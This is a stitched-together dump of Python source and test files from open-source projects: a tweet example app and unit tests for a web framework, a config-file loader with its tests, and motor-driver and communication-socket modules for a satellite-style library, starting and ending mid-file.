http_status = HTTPStatus.BAD_REQUEST
msg = "User already exists."
class UserNotExistErrInfo(ErrInfo):
http_status = HTTPStatus.BAD_REQUEST
msg = "User not found."
# Tweet
class TweetNotExistErrInfo(ErrInfo):
http_status = HTTPStatus.BAD_REQUEST
msg = "Tweets not found."
class TweetForbiddenErrInfo(ErrInfo):
http_status = HTTPStatus.FORBIDDEN
msg = "Deleting tweet was forbidden. Delete your own tweets."
# ----------------------------------------------------------------------------
# APIs ----------------------------------------------------------------------
class UserRegisterInput(JsonApiData):
email: str
name: str
class UserDeleteInput(JsonApiData):
email: str
class TweetsGetInput(JsonApiData):
email: t.Optional[str] = None
class SingleTweet(JsonApiData):
id: int
content: str
datetime: str
class TweetsGetOutput(JsonApiData):
tweets: t.List[SingleTweet]
class TweetPostInput(JsonApiData):
email: str
content: str
class TweetPostOutput(JsonApiData):
id: int
class TweetUpdateInput(JsonApiData):
id: int
new_content: str
class TweetDeleteInput(JsonApiData):
id: int
email: str
# --------------------------------------------------------------------------------
# User Model ------------------------------------------------------------------
class UserModel(ModelBase):
email = CharField(primary_key=True)
name = CharField()
class UserController(ControllerBase):
LEN_SERIAL_STRING = 16
def __init__(self, model: t.Type[UserModel]) -> None:
super().__init__(model)
self.model = model
def register(self, name: str, email: str) -> None:
try:
data = {"name": name, "email": email}
self.model.create(**data)
except IntegrityError as e:
raise UserAlreadyExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
def delete(self, email: str) -> None:
try:
model = self.model.get_by_id(email)
model.delete_instance()
except self.model.DoesNotExist as e:
raise UserNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
# --------------------------------------------------------------------------------
# Tweet Model ------------------------------------------------------------------
class TweetModel(ModelBase):
id = BigAutoField(primary_key=True)
user = ForeignKeyField(UserModel, backref="tweets")
content = TextField()
datetime = DateTimeField(default=datetime.now)
@dataclass
class Tweet:
id: int
content: str
datetime: str
class TweetController(ControllerBase):
def __init__(self, model: TweetModel) -> None:
super().__init__(model)
self.model = model
def post(self, email: str, content: str) -> int:
data = {"user": email, "content": content}
try:
model = self.model.create(**data)
except IntegrityError as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
else:
return model.id
def update(self, id: int, new_content: str) -> None:
try:
model = self.model.get_by_id(id)
model.content = new_content
model.save()
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
def delete(self, id: int, email: str) -> None:
try:
model = self.model.get_by_id(id)
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo from e
except Exception as e:
raise InternalErrInfo() from e
else:
if email != model.user.email:
raise TweetForbiddenErrInfo()
model.delete_instance()
def get_tweets(
self,
email: t.Optional[str] = None,
) -> t.List[SingleTweet]:
try:
if email is None:
query = self.model.select()
else:
query = self.model.select().where(self.model.user == email)
except self.model.DoesNotExist as e:
raise TweetNotExistErrInfo() from e
except Exception as e:
raise InternalErrInfo() from e
else:
tweets = [
SingleTweet(
id=m.id,
content=m.content,
datetime=m.datetime.ctime(),
)
for m in query
]
return tweets
# --------------------------------------------------------------------------------
# Endpoitns ----------------------------------------------------------------------
app = WSGIApp()
Callback_t = t.Callable[[WSGIEndpoint], None]
def print_request_body(callback: Callback_t) -> Callback_t:
@functools.wraps(callback)
def printer(self: WSGIEndpoint) -> None:
if len(self.body):
data = json.loads(self.body)
print("Requested")
print("---------")
print(json.dumps(data, indent=4))
callback(self)
return printer
@app.route("user")
class UserEndpoint(WSGIEndpoint):
def setup(self, controller: UserController) -> None:
self.controller = controller
@print_request_body
@data_format(input=UserRegisterInput, output=None)
def do_POST(self, req: UserRegisterInput) -> None:
self.controller.register(req.name, req.email)
self.send_only_status(HTTPStatus.OK)
@print_request_body
@data_format(input=UserDeleteInput, output=None)
def do_DELETE(self, req: UserDeleteInput) -> None:
self.controller.delete(req.email)
self.send_only_status(HTTPStatus.OK)
@app.route("tweet")
class TweetsEndpoint(WSGIEndpoint):
def setup(self, controller: TweetController) -> None:
self.controller = controller
@print_request_body
@data_format(input=TweetsGetInput, output=TweetsGetOutput)
def do_GET(self, req: TweetsGetInput) -> None:
tweets = self.controller.get_tweets(req.email)
self.send_json(TweetsGetOutput(tweets=tweets))
@print_request_body
@data_format(input=TweetPostInput, output=TweetPostOutput)
def do_POST(self, req: TweetPostInput) -> None:
id = self.controller.post(req.email, req.content)
self.send_json(TweetPostOutput(id=id))
@print_request_body
@data_format(input=TweetUpdateInput, output=None)
def do_PUT(self, req: TweetUpdateInput) -> None:
self.controller.update(req.id, req.new_content)
self.send_only_status(HTTPStatus.OK)
@print_request_body
@data_format(input=TweetDeleteInput, output=None)
def do_DELETE(self, req: TweetDeleteInput) -> None:
self.controller.delete(req.id, req.email)
self.send_only_status(HTTPStatus.OK)
# --------------------------------------------------------------------------------
# Client App ------------------------------------------------------------------
@dataclass
class Uris:
user: str
tweet: str
def confirm_yes_no(msg: str) -> bool:
is_yes = True
while True:
answer = input(msg + " [yes/no] : ")
if answer == "yes":
break
elif answer == "no":
is_yes = False
break
else:
print("yes か no で答えてください.")
return is_yes
def request_user_register(uris: Uris) -> str:
print("ユーザー登録をします.")
email = input("メールアドレスを入力してください : ")
name = input("お好きなユーザー名を登録してください : ")
with http.post(
uris.user,
json=UserRegisterInput(email=email, name=name),
) as res:
if res.ok:
print("ユーザー登録が完了しました.\n")
return email
else:
print(res.body.decode(), end="\n\n")
def request_user_delete(uris: Uris, email: str) -> None:
if not confirm_yes_no("本当に削除しますか?"):
print("削除を中止します.\n")
return
with http.delete(uris.user, json=UserDeleteInput(email=email)) as res:
if res.ok:
print("削除が完了しました.\n")
else:
print(res.body.decode(), end="\n\n")
def print_tweets(tweets: t.List[SingleTweet]) -> None:
for tweet in tweets:
print("-" * 30)
print()
print(f"ID: {tweet.id}")
print(f"Datetime: {tweet.datetime}")
print(f"Content: {tweet.content}")
print()
def request_tweets_all(uris: Uris, email: str) -> None:
with http.get(
uris.tweet,
json=TweetsGetInput(email=None),
datacls=TweetsGetOutput,
) as res:
if res.ok:
data = res.attach()
print_tweets(data.tweets)
else:
print(res.body.decode(), end="\n\n")
def request_tweets_history(uris: Uris, email: str) -> None:
with http.get(
uris.tweet,
json=TweetsGetInput(email=email),
datacls=TweetsGetOutput,
) as res:
if res.ok:
data = res.attach()
print_tweets(data.tweets)
else:
print(res.body.decode(), end="\n\n")
def request_tweet_post(uris: Uris, email: str) -> None:
content = input("ツイート内容 >> ")
with http.post(
uris.tweet,
json=TweetPostInput(email=email, content=content),
datacls=TweetPostOutput,
) as res:
if res.ok:
data = res.attach()
print(f"投稿が完了しました.ID: {data.id}\n")
else:
print(res.body.decode(), end="\n\n")
def request_tweet_update(uris: Uris, email: str) -> None:
id = int(input("編集したいツイートID: "))
content = input("新しいツイート内容 >> ")
with http.put(
uris.tweet,
json=TweetUpdateInput(id=id, new_content=content),
) as res:
if res.ok:
print(f"投稿が完了しました.\n")
else:
print(res.body.decode(), end="\n\n")
def request_tweet_delete(uris: Uris, email: str) -> None:
id = int(input("削除したいツイートID: "))
with http.delete(
uris.tweet,
json=TweetDeleteInput(id=id, email=email),
) as res:
if res.ok:
print("削除が完了しました.\n")
elif res.status == HTTPStatus.FORBIDDEN:
print("あなたのツイートではありません.\n")
else:
print(res.body.decode(), end="\n\n")
COMMANDS = (
(1, "exit", "ユーザーを削除します", request_user_delete),
(2, "all", "全てのツイートを表示します", request_tweets_all),
(3, "history", "ツイート履歴を表示します", request_tweets_history),
(4, "post", "新規ツイートをします", request_tweet_post),
(5, "update", "ツイート内容を編集します", request_tweet_update),
(6, "delete", "ツイートを削除します", request_tweet_delete),
)
def display_commands():
print("-" * 60)
for no, command, explain, _ in COMMANDS:
print(f"{no:>4} : {command:^10} : {explain:<30}")
print("-" * 60)
def request_interact(uris: Uris):
is_registered = confirm_yes_no("ユーザー登録はしていますか?")
if is_registered:
email = input("メールアドレスを入力してください: ")
else:
email = request_user_register(uris)
display_commands()
print("上のコマンド一覧から実行したいコマンドを選んでください.No でも コマンド名でも構いません."
"終了したい場合は 'q',コマンド一覧を表示したい場合は 'd' を入力してください.\n")
while True:
request = input("No または コマンド名 >> ")
if request == "q":
break
if request == "d":
display_commands()
continue
if request.isdigit():
request = int(request)
print()
for no, command, _, func in COMMANDS:
if request in (no, command):
func(uris, email)
break
else:
print("一致するコマンドが存在しません.\n")
# --------------------------------------------------------------------------------
if __name__ == "__main__":
import sys
uris = Uris(
"http://localhost:8000/user",
"http://localhost:8000/tweet",
)
user_controller = UserController(UserModel)
tweet_controller = TweetController(TweetModel)
app.set_parcel(UserEndpoint, user_controller)
app.set_parcel(TweetsEndpoint, tweet_controller)
if len(sys.argv) == 1:
form = WSGIServerForm("", 8000, app, "app.log")
executor = WSGITestExecutor(form)
executor.exec(request_interact, args=(uris,))
elif sys.argv[1] == "client":
request_interact(uris)
```
#### File: examples/upsidedown/serve.py
```python
from bamboo import (
JsonApiData,
WSGIApp,
WSGIEndpoint,
WSGITestExecutor,
)
from bamboo.sticky.http import data_format
app = WSGIApp()
class UpsideDownRequest(JsonApiData):
token: str
class UpsideDownResponse(JsonApiData):
result: str
@app.route("upsidedown")
class UpsideDownEndpoint(WSGIEndpoint):
@data_format(input=UpsideDownRequest, output=UpsideDownResponse)
def do_GET(self, req_body: UpsideDownRequest) -> None:
result = req_body.token[::-1]
self.send_json(UpsideDownResponse(result=result))
if __name__ == "__main__":
WSGITestExecutor.debug(app)
```
#### File: bamboo/js_tests/run_tests.py
```python
import http.server
import multiprocessing as mp
from pathlib import Path
import socket
import socketserver
import time
import typing as t
import webbrowser
from bamboo import WSGITestExecutor
from .app import js_tests_app
HOST_WEB = "localhost"
PORT_WEB = 8000
HOST_APP = "localhost"
PORT_APP = 9000
DIR_WEB = str((Path(__file__).parent / "web").absolute())
class WebHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def setup(self) -> None:
super().setup()
self.directory = DIR_WEB
class WebServer(socketserver.TCPServer):
def __init__(
self,
server_address: t.Tuple[str, int],
RequestHandlerClass: t.Callable[..., socketserver.BaseRequestHandler],
bind_and_activate: bool = True,
) -> None:
socketserver.BaseServer.__init__(
self,
server_address,
RequestHandlerClass,
)
self.socket = socket.socket(
self.address_family,
self.socket_type,
)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if bind_and_activate:
try:
self.server_bind()
self.server_activate()
except:
self.server_close()
raise
def run_app_server() -> None:
WSGITestExecutor.debug(js_tests_app, HOST_APP, PORT_APP)
def run_web_server() -> None:
with WebServer(
(HOST_WEB, PORT_WEB),
WebHTTPRequestHandler,
) as server:
server.serve_forever()
def run_servers() -> t.Tuple[mp.Process, mp.Process]:
ps_app = mp.Process(target=run_app_server)
ps_app.start()
ps_web = mp.Process(target=run_web_server)
ps_web.start()
time.sleep(0.05)
return (ps_app, ps_web)
def main() -> None:
ps_app, ps_web = run_servers()
webbrowser.open_new(f"http://{HOST_WEB}:{PORT_WEB}")
try:
while True:
time.sleep(10000)
except KeyboardInterrupt:
print()
finally:
ps_app.terminate()
ps_web.terminate()
ps_app.join()
ps_web.join()
ps_app.close()
ps_web.close()
if __name__ == "__main__":
main()
```
#### File: bamboo/scripts/init_dev_env.py
```python
import subprocess
def init_dev_env() -> None:
cmds = [
["pipenv", "install"],
["pipenv", "install", "--dev"],
["git", "config", "commit.message", ".gitmessage"],
]
for cmd in cmds:
subprocess.run(cmd)
if __name__ == "__main__":
init_dev_env()
```
#### File: tests/tests_app/test_version.py
```python
import unittest
from bamboo import (
WSGIApp,
WSGIEndpoint,
VersionConfig,
)
app = WSGIApp()
@app.route("test", "hoge", version=1)
class TestEndpointSingle(WSGIEndpoint):
ideal_uris = [
("v1", "test", "hoge"),
]
@app.route("test", "hogehoge", version=(1, 2, 3))
class TestEndpointMultiple(WSGIEndpoint):
ideal_uris = [
("v1", "test", "hogehoge"),
("v2", "test", "hogehoge"),
("v3", "test", "hogehoge"),
]
@app.route("test", "hogest", version=None)
class TestEndpointAny(WSGIEndpoint):
ideal_uris = [
("test", "hogest")
]
class TestEndpointNothing(WSGIEndpoint):
pass
class TestVersion(unittest.TestCase):
def test_version_single(self):
config = VersionConfig(TestEndpointSingle)
self.assertEqual(config.get(app), (1,))
uris = app.search_uris(TestEndpointSingle)
for uri, ideal in zip(uris, TestEndpointSingle.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_multiple(self):
config = VersionConfig(TestEndpointMultiple)
self.assertEqual(config.get(app), (1, 2, 3))
uris = app.search_uris(TestEndpointMultiple)
for uri, ideal in zip(uris, TestEndpointMultiple.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_any(self):
config = VersionConfig(TestEndpointAny)
self.assertEqual(config.get(app), ())
uris = app.search_uris(TestEndpointAny)
for uri, ideal in zip(uris, TestEndpointAny.ideal_uris):
self.assertEqual(uri, ideal)
def test_version_nothing(self):
config = VersionConfig(TestEndpointNothing)
self.assertEqual(config.get(app), None)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/tests_io/test_buffered_binary_iterator.py
```python
from os import getrandom
import unittest
from bamboo import BufferedBinaryIterator
class TestBufferedBinaryIterator(unittest.TestCase):
def setUp(self) -> None:
self.total = 10**5
self.bufsize = 8192
self.data = getrandom(self.total)
self.iter = BufferedBinaryIterator(self.data, self.bufsize)
def test_iter(self):
sum = 0
for i in self.iter:
diff = self.total - sum
if diff < self.bufsize:
self.assertEqual(len(i), diff)
else:
self.assertEqual(len(i), self.bufsize)
sum += len(i)
self.assertEqual(sum, self.total)
if __name__ == "__main__":
unittest.main()
```
#### File: tests_sticky/http/test_sticky_has_header_of.py
```python
import unittest
from bamboo import (
ASGIApp,
ASGIHTTPEndpoint,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.request import http
from bamboo.sticky.http import has_header_of
from bamboo.util.string import rand_string
from ... import get_log_name
from ...asgi_util import ASGIServerForm, ASGITestExecutor
app_asgi = ASGIApp()
app_wsgi = WSGIApp()
PATH_ASGI_SERVER_LOG = get_log_name(__file__, "asgi")
PATH_WSGI_SERVER_LOG = get_log_name(__file__, "wsgi")
RANDOM_HEADERS = [(rand_string(10), rand_string(10)) for _ in range(10)]
@app_asgi.route()
class TestASGIHTTPEndpoint(ASGIHTTPEndpoint):
@has_header_of(RANDOM_HEADERS[0][0])
@has_header_of(RANDOM_HEADERS[1][0])
@has_header_of(RANDOM_HEADERS[2][0])
@has_header_of(RANDOM_HEADERS[3][0])
@has_header_of(RANDOM_HEADERS[4][0])
@has_header_of(RANDOM_HEADERS[5][0])
@has_header_of(RANDOM_HEADERS[6][0])
@has_header_of(RANDOM_HEADERS[7][0])
@has_header_of(RANDOM_HEADERS[8][0])
@has_header_of(RANDOM_HEADERS[9][0])
async def do_GET(
self,
header0: str,
header1: str,
header2: str,
header3: str,
header4: str,
header5: str,
header6: str,
header7: str,
header8: str,
header9: str,
) -> None:
self.send_only_status()
@app_wsgi.route()
class TestWSGIEndpoint(WSGIEndpoint):
@has_header_of(RANDOM_HEADERS[0][0])
@has_header_of(RANDOM_HEADERS[1][0])
@has_header_of(RANDOM_HEADERS[2][0])
@has_header_of(RANDOM_HEADERS[3][0])
@has_header_of(RANDOM_HEADERS[4][0])
@has_header_of(RANDOM_HEADERS[5][0])
@has_header_of(RANDOM_HEADERS[6][0])
@has_header_of(RANDOM_HEADERS[7][0])
@has_header_of(RANDOM_HEADERS[8][0])
@has_header_of(RANDOM_HEADERS[9][0])
def do_GET(
self,
header0: str,
header1: str,
header2: str,
header3: str,
header4: str,
header5: str,
header6: str,
header7: str,
header8: str,
header9: str,
) -> None:
self.send_only_status()
class TestStickyHasHeaderOf(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
form_asgi = ASGIServerForm("", 8000, app_asgi, PATH_ASGI_SERVER_LOG)
form_wsgi = WSGIServerForm("", 8001, app_wsgi, PATH_WSGI_SERVER_LOG)
cls.executor_asgi = ASGITestExecutor(form_asgi).start_serve()
cls.executor_wsgi = WSGITestExecutor(form_wsgi).start_serve()
cls.uri_asgi = "http://localhost:8000"
cls.uri_wsgi = "http://localhost:8001"
@classmethod
def tearDownClass(cls) -> None:
cls.executor_asgi.close()
cls.executor_wsgi.close()
def test_asgi(self):
with http.get(self.uri_asgi, headers=dict(RANDOM_HEADERS)) as res:
self.assertTrue(res.ok)
def test_wsgi(self):
with http.get(self.uri_wsgi, headers=dict(RANDOM_HEADERS)) as res:
self.assertTrue(res.ok)
if __name__ == "__main__":
unittest.main()
```
#### File: tests_sticky/http/test_sticky_may_occur.py
```python
import unittest
from bamboo import (
ASGIHTTPEndpoint,
ErrInfo,
WSGIEndpoint,
)
from bamboo.sticky.http import HTTPErrorConfig, may_occur
ERRORS = [type(f"TestErr{i}", (ErrInfo,), {}) for i in range(10)]
class TestWSGIEndpoint(WSGIEndpoint):
@may_occur(*ERRORS)
def do_GET(self) -> None:
pass
class TestASGIHTTPEndpoint(ASGIHTTPEndpoint):
@may_occur(*ERRORS)
async def do_GET(self) -> None:
pass
class TestSticyMayOccur(unittest.TestCase):
def check_registered(self, callback):
config = HTTPErrorConfig(callback)
errors_registered = config.get()
for err in ERRORS:
self.assertIn(err, errors_registered)
def test_wsgi(self):
self.check_registered(TestWSGIEndpoint.do_GET)
def test_asgi(self):
self.check_registered(TestASGIHTTPEndpoint.do_GET)
if __name__ == "__main__":
unittest.main()
```
#### File: tests/tests_test/test_test_executor.py
```python
import unittest
from bamboo import (
ContentType,
MediaTypes,
WSGIApp,
WSGIEndpoint,
WSGIServerForm,
WSGITestExecutor,
)
from bamboo.api import JsonApiData
from bamboo.request import http
from bamboo.sticky.http import data_format
from bamboo.util.time import get_datetime_rfc822
from .. import PATH_IMAGE, get_log_name
NAME_SERVER = "Mocker"
PATH_SERVER_LOG_1 = get_log_name(__file__, "1")
PATH_SERVER_LOG_2 = get_log_name(__file__, "2")
PATH_SERVER_LOG_3 = get_log_name(__file__, "3")
class InfoResponse(JsonApiData):
server_name: str
current_time: str
class MockInfoEndpoint(WSGIEndpoint):
@data_format(input=None, output=InfoResponse)
def do_GET(self) -> None:
body = {
"server_name": NAME_SERVER,
"current_time": get_datetime_rfc822()
}
self.send_json(body)
class MockImageEndpoint(WSGIEndpoint):
def do_GET(self) -> None:
with open(PATH_IMAGE, "rb") as f:
image = f.read()
self.send_body(image, content_type=ContentType(MediaTypes.jpeg))
class TestTestExecutor(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.urls_info = [f"http://localhost:800{i}/mock/info" for i in range(3)]
cls.urls_image = [f"http://localhost:800{i}/mock/image" for i in range(3)]
app_1 = WSGIApp()
app_2 = WSGIApp()
app_3 = WSGIApp()
for app in (app_1, app_2, app_3):
app.route("mock", "info")(MockInfoEndpoint)
app.route("mock", "image")(MockImageEndpoint)
form_1 = WSGIServerForm("", 8000, app_1, PATH_SERVER_LOG_1)
form_2 = WSGIServerForm("", 8001, app_2, PATH_SERVER_LOG_2)
form_3 = WSGIServerForm("", 8002, app_3, PATH_SERVER_LOG_3)
cls.executor = WSGITestExecutor(form_1, form_2, form_3).start_serve()
@classmethod
def tearDownClass(cls) -> None:
cls.executor.close()
def test_get_info(self):
for url in self.urls_info:
res = http.get(url, datacls=InfoResponse)
data = res.attach()
self.assertTrue(isinstance(data, InfoResponse))
self.assertEqual(data.server_name, "Mocker")
def test_get_image(self):
with open(PATH_IMAGE, "rb") as f:
image_ideal = f.read()
for url in self.urls_image:
res = http.get(url)
data = res.body
self.assertEqual(image_ideal, data)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jjj999/gileum",
"score": 2
} |
#### File: gileum/gileum/loader.py
```python
from importlib.machinery import ModuleSpec
import importlib.util
import inspect
import os
from pathlib import Path
import sys
import typing as t
from .gileum import BaseGileum
from .manager import _get_glm_manager
def _convert2relative_path(path: str) -> str:
return str(Path(path).relative_to(os.getcwd()))
def _import_directly(file: str) -> ModuleSpec:
if os.path.isabs(file):
file = _convert2relative_path(file)
mod_name = file.replace(os.sep, ".")
spec = importlib.util.spec_from_file_location(mod_name, file)
mod = importlib.util.module_from_spec(spec)
sys.modules[mod_name] = mod
spec.loader.exec_module(mod)
return mod
def _search_glm_from_mod(mod: ModuleSpec) -> t.List[BaseGileum]:
f_predicate = lambda obj: isinstance(obj, BaseGileum)
return [val for _, val in inspect.getmembers(mod, f_predicate)]
def _has_glmfile_name(file: str) -> bool:
base = os.path.basename(file)
return base.startswith("glm_") and base.endswith(".py")
def list_glmfiles(dir: str, join: bool = True) -> t.List[str]:
files = filter(_has_glmfile_name, os.listdir(dir))
if join:
files = map(lambda f: os.path.join(dir, f), files)
return list(files)
def load_glms_at(file: str) -> None:
mod = _import_directly(file)
glms = _search_glm_from_mod(mod)
manager = _get_glm_manager()
for glm in glms:
manager._set_glm(glm)
def load_glms_in(dir: str) -> None:
for gilfile in list_glmfiles(dir):
load_glms_at(gilfile)
```
#### File: gileum/tests/test_loader.py
```python
from os.path import basename, join
import unittest
from gileum.loader import (
list_glmfiles,
load_glms_at,
load_glms_in,
)
from gileum.manager import (
GileumManager,
init_glm_manager,
get_glm,
_reset_glm_manager,
)
from gileum.test import MockGileum
from . import DIR_RES, FILE_SETTING
TEST_NAME = "unittest<EMAIL>"
DEVELOPER_NAME = "jjj999"
GLM_NAME = "main"
class TestLoader(unittest.TestCase):
def setUp(self) -> None:
_reset_glm_manager()
init_glm_manager(GileumManager())
def test_list_glmfiles(self) -> None:
result = list_glmfiles(DIR_RES)
self.assertEqual(len(result), 1)
glm_file = result[0]
self.assertTrue(basename(glm_file), "glm_mock_setting.py")
def assertGileum(self, glm: MockGileum) -> None:
self.assertEqual(glm.test_name, TEST_NAME)
self.assertEqual(glm.developer_name, DEVELOPER_NAME)
self.assertIsInstance(glm.current_time, float)
self.assertEqual(glm.glm_name, GLM_NAME)
def test_load_glms_at(self) -> None:
load_glms_at(join(DIR_RES, FILE_SETTING))
glm = get_glm(MockGileum, GLM_NAME)
self.assertGileum(glm)
def test_load_glms_in(self) -> None:
load_glms_in(DIR_RES)
glm = get_glm(MockGileum, GLM_NAME)
self.assertGileum(glm)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jjj999/pisat",
"score": 3
} |
#### File: pisat/actuator/two_wheels.py
```python
from typing import Optional, Union
from enum import Enum
from pisat.actuator.rotate_motor_driver_base import RotateMotorDriverBase
class TwoWheels(RotateMotorDriverBase):
def __init__(self,
driver_L: RotateMotorDriverBase,
driver_R: RotateMotorDriverBase,
name: Optional[str] = None) -> None:
super().__init__(name=name)
if not isinstance(driver_L, RotateMotorDriverBase):
raise TypeError(
"'driver_L' must be RotateMotorDriverBase."
)
if not isinstance(driver_R, RotateMotorDriverBase):
raise TypeError(
"'driver_R' must be RotateMotorDriverBase."
)
if driver_L.__class__ is not driver_R.__class__:
raise TypeError(
"'driver_L' and 'driver_R' must be objects of same type."
)
self._driver_L: RotateMotorDriverBase = driver_L
self._driver_R: RotateMotorDriverBase = driver_R
self._current_param: Union[int, float] = 0.
def standby(self) -> None:
self._driver_L.standby()
self._driver_R.standby()
def brake(self) -> None:
self._driver_L.brake()
self._driver_R.brake()
self._current_param = 0.
# TODO
#
def straight(self, param: Optional[Union[int, float]] = None) -> None:
if param >= 0:
self._driver_L.cw(param)
self._driver_R.ccw(param)
else:
self._driver_L.ccw(param)
self._driver_R.cw(param)
self._current_param = param
def cw(self, param: Union[int, float]) -> None:
self.brake()
if param >= 0:
self._driver_L.cw(param)
else:
self._driver_R.cw(abs(param))
def ccw(self, param: Union[int, float]) -> None:
self.brake()
if param >= 0:
self._driver_R.ccw(param)
else:
self._driver_L.ccw(abs(param))
def curve_cw(self,
dec: Union[int, float],
base: Optional[Union[int, float]] = None) -> None:
if base is not None:
self._current_param = base
value_decelerated = self._current_param * (1 - dec / 100)
if value_decelerated < 0:
value_decelerated = 0
if self._current_param >= 0:
self._driver_L.cw(value_decelerated)
self._driver_R.ccw(self._current_param)
else:
self._driver_L.ccw(self._current_param)
self._driver_R.cw(value_decelerated)
def curve_ccw(self,
dec: Union[int, float],
base: Optional[Union[int, float]] = None) -> None:
if base is not None:
self._current_param = base
value_decelerated = self._current_param * (1 - dec / 100)
if value_decelerated < 0:
value_decelerated = 0
if self._current_param >= 0:
self._driver_L.cw(self._current_param)
self._driver_R.ccw(value_decelerated)
else:
self._driver_L.ccw(value_decelerated)
self._driver_R.cw(self._current_param)
```
#### File: pisat/base/component_group.py
```python
from typing import Dict, Optional, Tuple
from pisat.base.component import Component
class ComponentGroup(Component):
"""The group of components in the pisat system.
This class represents a group of components, which means objects of
this class hold some objects of Component inside. This class can
make users access to internal components through some methods.
Objects of this class is also a component.
See Also
--------
pisat.base.Component : A component group holds some components.
"""
def __init__(self, name: Optional[str] = None) -> None:
"""
Parameters
----------
name : Optional[str], optional
Name of the component, by default None
"""
super().__init__(name=name)
# Map from names to internal components
self._NtoC: Dict[str, Component] = {}
def append(self, *components: Tuple[Component, ...]):
"""Append components to the inside.
Parameter
---------
*components : Tuple[Component, ...]
Components to be registered inside the component group.
Raises
------
NotImplementedError
Raised if given objects are not components.
"""
for component in components:
if not isinstance(component, Component):
raise NotImplementedError(
"A given object has not implemented Component class."
)
self._NtoC[component.name] = component
def get_component(self, name: str) -> Optional[Component]:
"""Retrieve a component from its name.
This method returns a None if the given name doesn't match
any names of internal components of the component group.
Parameters
----------
name : str
Name of the component.
Returns
-------
Optional[Component]
Component whose name matches the given name if exists.
Raises
------
TypeError
Raised if the given name is not str.
"""
if not isinstance(name, str):
raise TypeError(
"'name' must be str."
)
return self._NtoC.get(name)
def get_components(self, *names: Tuple[str, ...]) -> Dict[str, Component]:
"""Retrieve components from their names.
This method returns the result as a dictionary, whose keys are
names of components and values are objects of Component. If no
given names match names of internal components, then a empty
dictionary is returned.
This method uses the 'get_component' method inside.
Parameters
----------
*names : Tuple[str, ...]
Names of components for retrieving.
Returns
-------
Dict[str, Component]
Components whose names match the given names if exists.
"""
result = {}
for name in names:
obj = self.get_component(name)
if obj is not None:
result[name] = obj
return result
```
#### File: comm/transceiver/comm_socket.py
```python
from typing import Optional, Union
from pisat.base.component import Component
from pisat.comm.transceiver.comm_stream import CommBytesStream
from pisat.comm.transceiver.transceiver_base import TypeAddress
class CommSocket(Component):
"""Socket to communicate pear to pear via transceiver.
This class represents object like the socket of python,
whose has a single connection.
This class is not instanciated by users, but by a
SocketTransceiver object.
"""
# NOTE this transceiver must be SocketTransceiver
def __init__(self,
transceiver,
recv_stream: CommBytesStream,
send_stream: CommBytesStream,
address_mine: TypeAddress,
address_yours: TypeAddress,
name: Optional[str] = None) -> None:
"""
Parameters
----------
transceiver : SocketTransceiver
SocketTransceiver which generates this object.
recv_stream : CommBytesStream
Internal stream for receiveing data.
send_stream : CommBytesStream
Internal stream for sending data.
address_mine : TypeAddress
Logical address of this socket.
address_yours : TypeAddress
Logical address of the other socket to communicate.
name : Optional[str], optional
Name of this component, by default None
"""
super().__init__(name=name)
self._transceiver = transceiver
self._recv_stream: CommBytesStream = recv_stream
self._send_stream: CommBytesStream = send_stream
self._addr_mine: TypeAddress = address_mine
self._addr_yours: TypeAddress = address_yours
@property
def addr_mine(self):
return self._addr_mine
@property
def addr_yours(self):
return self._addr_yours
@property
def counts_recv(self):
return len(self._recv_stream)
@property
def counts_send(self):
return len(self._send_stream)
@property
def period(self):
return self._transceiver.period
@property
def certain(self):
return self._transceiver.certain
def encode(self, data: str) -> bytes:
"""Encode str into bytes with certain encoding.
Parameters
----------
data : str
Data to be encoded.
Returns
-------
bytes
Data encoded.
"""
return self._transceiver.encode(data)
def decode(self, data: Union[bytes, bytearray]) -> str:
"""Decode bytes into str with certain encoding.
Parameters
----------
data : Union[bytes, bytearray]
Data to be decoded.
Returns
-------
str
Data decoded.
"""
return self._transceiver.decode(data)
def close(self) -> None:
"""Close this socket.
This method deletes the object. After execution of the method,
the object will not be accessed.
"""
self._transceiver.closes(self)
def recv(self, count: int = -1, load: bool = True, ignore: bool = False) -> bytes:
"""Receive data from the other socket.
Parameters
----------
count : int
Size of bytes to be received.
load : bool, optional
If loads internal buffer for receiving, by default True
Returns
-------
bytes
Data which is received successfully.
Notes
-----
Returned data may have smaller size than specified because
data is not be retreived further more.
"""
if load:
self._transceiver.load(ignore=ignore)
if count < 0:
count = self.counts_recv
return self._recv_stream.pop(count)
def send_later(self, data: Union[bytes, bytearray]) -> None:
"""Add data into the internal buffer as reserved data.
This method add data into the internal buffer but the
data is not sended until the buffer is flushed. If you
want to send after this method, then you can use the
'flush' method to flush the internal buffer.
Parameters
----------
data : Union[bytes, bytearray]
Data to be send in the future.
Notes
-----
If you want to send earlier, consider using the 'send'
method.
"""
self._send_stream.add(data)
def flush(self,
blocking: bool = True,
period: Optional[float] = None,
certain: Optional[bool] = None) -> None:
"""Flush internal sending-buffer of the socket.
Parameters
----------
blocking : bool, optional
If blocks and flushes, by default True
period : Optional[float], optional
Period for sending, by default None
certain : Optional[bool], optional
If the transceiver sends data certainly, by default None
Notes
-----
If period is None, then the method uses the value of
CommSocket.period property as the parameter of period.
If the 'blocking' is False, then this method executes
the task of sending in another thread.
If certain is None, then the method uses the value of
CommSocket.certain property as the parameter of certain.
"""
self._transceiver.flush(socket=self, blocking=blocking, period=period, certain=certain)
def send(self,
data: Union[bytes, bytearray],
blocking: bool = True,
period: Optional[float] = None,
certain: Optional[bool] = None) -> None:
"""Send data to the other socket.
Calling this method is same as calling the 'send_later' method
and the 'flush' method in a row.
Parameters
----------
data : Union[bytes, bytearray]
Data to be send.
blocking : bool, optional
If blocks and flushes, by default True
period : Optional[float], optional
